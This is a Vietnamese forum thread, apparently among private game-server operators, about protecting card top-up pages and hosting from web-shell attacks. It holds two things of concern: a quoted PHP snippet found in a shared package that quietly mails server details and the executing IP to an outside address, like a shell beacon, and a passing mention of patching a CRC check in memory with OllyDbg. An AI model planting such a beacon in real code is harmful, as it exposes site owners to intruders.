Thích nhất câu này . Hôm qua làm mấy 30 phút nhưng nghĩ lại vô tác dụng ko làm nữa

Làm cái load file rar trên host ( tất nhiên file này đặt mật khẩu )

Và giải nén nó ra khi nào cần hoặc làm cứ 10s nó giải nén 1 lần ;))

Nói chung chắc cú nhất vẫn là cách của anh nhỉ . Remote = mắt khi ko mở port remote nào thì lấy (;) nó ra để remote ah . ( còn vấn đề thay file = ... thì quá dễ =)) )

Cũng nhờ vụ này làm đc 2 cái việc :

1. LÀM cứ thấy Client connect là Server gửi file đến
2. Chưa nghĩ ra nhưng có ý tưởng rồi


Projetc này stop để dành làm anti kiếm thế và võ lâm chơi =))


Nếu đã can thiệp vào được vps rùi thì chả ai ngu mà không can thiệp vào process memory để thay đổi cái biến CRCFILE_1 thành 1 giá trị khác or load vô olly jmp nó đi cho nó chạy vô tác dụng =.='

cái tối qua làm mã hóa và ko thèm check CRC File nữa =))

sv của bkns config theo mình hiện tại thì khá ổn, dịch vụ tốt nhưng cả bkns cũng chẳng ngờ là bkns lại bị hack ;))
bkns từng tài trợ cho bên mình con vps linux ram 4gb chạy forum :D
vps ngon nhưng fải đúng người sử dụng thì nó mới phát huy hết khả năng nó :)
thế bạn có thể giải thích rõ hơn cho mọi người biết chmod như thế là như nào k
ví dụ như quyền ghi, quyền đọc, quyền viết, ...

đừng hỏi vặn vẹo topic này đang thảo luận về chống hack thẻ web rs tôi chỉ bảo chmod file còn bạn hỏi ngoài lề quá rồi bạn pro thì giúp anh Hao Hoa đi kìa funny

Các bác cho em hỏi, máy chủ em tắt port Remote, Port 80 chỉ cho IP hosting truy cập vào web server để chạy site tài khoản, như vậy thì máy chủ đã an toàn chưa, giờ chỉ còn mỗi Hosting người ta vẫn chèn shell sửa code được nếu mà chống được nốt trên hosting chắc là an toàn nhỉ :(

Các bác cho em hỏi, máy chủ em tắt port Remote, Port 80 chỉ cho IP hosting truy cập vào web server để chạy site tài khoản, như vậy thì máy chủ đã an toàn chưa, giờ chỉ còn mỗi Hosting người ta vẫn chèn shell sửa code được nếu mà chống được nốt trên hosting chắc là an toàn nhỉ :(

Thực ra cũng o cần lo lắng quá đâu , để chèn đc shell không phải nói chèn là chèn đc , thường thì các bồ sẽ có sẵn shell cũ trên sever đó rồi , sau đó mới local qua , tất nhiên là check toàn bộ sever rồi kiếm site lỗi up shell cũng có , nhưng cũng mất khá nhiều thời gian .

Trước mắt : cứ theo dõi sát thu nhập , so sánh với log thẻ nạp trên sever + với để lại số ĐT hỗ trợ cho mem , gọi ngay sau khi mem nạp nếu o thành công.

Lúc trước bồ giấc mơ cuối ở BYG có 1 site bán host , site đó chmod ngược , thậm chí có shell cũng o làm j đc , nhưng lâu quá o động nên quên bất site này là j rồi , dạo này mình cũng ít vào BYG, giấc mơ cuối cũng ẩn dật , o hay vào nữa nên cũng loãng dần dần .

Các bác cho em hỏi, máy chủ em tắt port Remote, Port 80 chỉ cho IP hosting truy cập vào web server để chạy site tài khoản, như vậy thì máy chủ đã an toàn chưa, giờ chỉ còn mỗi Hosting người ta vẫn chèn shell sửa code được nếu mà chống được nốt trên hosting chắc là an toàn nhỉ :(

Mình thuê các Hosting sau đây đều bị hack hết, datapool.vn, hostvn.net, superhost.vn, đang thuê thử aluhost chạy thử nếu bị nữa chắc phải đầu tư 1 mạng cáp quang + 1 máy + thuê người bảo mật để chạy web vậy :( dự kiến là 6 đến 7tr, không đủ nhiệt chắc thuê tạm vps 1GB :-<

Mình thuê các Hosting sau đây đều bị hack hết, datapool.vn, hostvn.net, superhost.vn, đang thuê thử aluhost chạy thử nếu bị nữa chắc phải đầu tư 1 mạng cáp quang + 1 máy + thuê người bảo mật để chạy web vậy :( dự kiến là 6 đến 7tr, không đủ nhiệt chắc thuê tạm vps 1GB :-<

Đổi tên file , và đường dẫn file nạp thẻ , mã hóa toàn bộ code , để hacker có mò vào cũng o biết sửa file nào , decode thì cũng mất cả tá thời gian ,
Kiểm tra lại thật kỹ code xem có shell

p/s: nhờ là trước khi mã hóa thì lưu 1 bản chưa mã hóa để sau này sửa j thì sửa nhá , mã hóa xòng là toàn 00000000### thôi đấy

Đổi tên file , và đường dẫn file nạp thẻ , mã hóa toàn bộ code , để hacker có mò vào cũng o biết sửa file nào , decode thì cũng mất cả tá thời gian ,
Kiểm tra lại thật kỹ code xem có shell

Mình xóa hết sạch để lại mỗi mấy thư mục trống không có gì bên trong, thế mà ngày mai vào thấy anh shell đã có mặt, cái này mình nghĩ bị local vào máy chủ host rồi :|

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> g (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> g)

Mình xóa hết sạch để lại mỗi mấy thư mục trống không có gì bên trong, thế mà ngày mai vào thấy anh shell đã có mặt, cái này mình nghĩ bị local vào máy chủ host rồi :|

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> g (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> g)

Bạn pm yahoo mình để mình thử chống run shell :

thuynga9119

mã hóa zend các file trên host cũng được đó.làm cho hacker phải mã hóa lại(mất time).đổi lại đường dẫn và tên file nạp thẻ đi.cho nó tìm cả ngày.:))
lưu ý:host phải hỗ trợ zend đó.
link hướng dẫn : <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
chia sẻ thêm cho các ae nhà cung cấp host khó local theo các pro BYG bình chọn

3. Các nhà cung cấp thuộc dạng có shell nhưng vẫn o làm đc gì

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
ae dùng thử nhá.

mã hóa zend các file trên host cũng được đó.làm cho hacker phải mã hóa lại(mất time).đổi lại đường dẫn và tên file nạp thẻ đi.cho nó tìm cả ngày.:))
lưu ý:host phải hỗ trợ zend đó.
link hướng dẫn : <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
chia sẻ thêm cho các ae nhà cung cấp host khó local theo các pro BYG bình chọn

ae dùng thử nhá.

Để mình dùng thử xem sao :), cái công ty này ở ngay gần nhà mình đi bộ ra tý là tới :D

Nên thuê bảo mật nếu các bạn có điều kiện cũng rẻ thôi mà

Nếu các bạn nào đang bị cái hack này thì cùng vào đây thảo luận nha <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Còn nếu ai pro về bảo mật thì cho xin cái yahoo tốn ít phí cũng được :) miễn sao đừng bị các bác hacker phá hoài cơm cháo gì cũng đi ráo :)

ủa hóa ra mu.name.vn là của bác LHB à hôm trc phải cho thuê host up ko nhỉ

Mình thấy 1 đoạn code thế này trong bản nweb


<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);

Ai dịch hộ mình với

Mình thấy 1 đoạn code thế này trong bản nweb



Ai dịch hộ mình với
code này ở file nào cậu.
30ckarrrrrrrrrrrrrrrrrrrrrrrrr

ở ngay file index.php trong thư mục hosting Nweb bác hrain share
---
Qn chỗ nào đấy, rảnh a e đi cafe tiện thể hướng dẫn t mấy bài chống hack

ở ngay file index.php trong thư mục hosting Nweb bác hrain share
---
Qn chỗ nào đấy, rảnh a e đi cafe tiện thể hướng dẫn t mấy bài chống hack

tình hình là file index.phph của mình k có nhé.xem lại.;))

Mình thấy 1 đoạn code thế này trong bản nweb



Ai dịch hộ mình với

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Ý của mình là nó lấy dc những thông tin gì...

Ý của mình là nó lấy dc những thông tin gì...

kiểm soát toàn bọ wen trên host của bạn

kiểm soát toàn bọ wen trên host của bạn

tình hình là người hack đang dần lộ ra rồi đây.:P

tình hình là người hack đang dần lộ ra rồi đây.:p

ko biết là ninh em xi đang ám chỉ ai

tôi hay godhoang thế (:|

tình hình là người hack đang dần lộ ra rồi đây.:P




ai vậy cậu để anh em 8-X :D......................

ai vậy cậu để anh em 8-X :D......................


<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);

code này trong nbb.8-|

30chaiiiiiiiiiiiiiiiiiiiiiiiiiiii

Mình để chung với forum :( , quả này làm lại vỡ mặt rồi

Mình để chung với forum :( , quả này làm lại vỡ mặt rồi


không chỉ bị hack thôi bạn ạ
chứ ko vỡ mặt đâu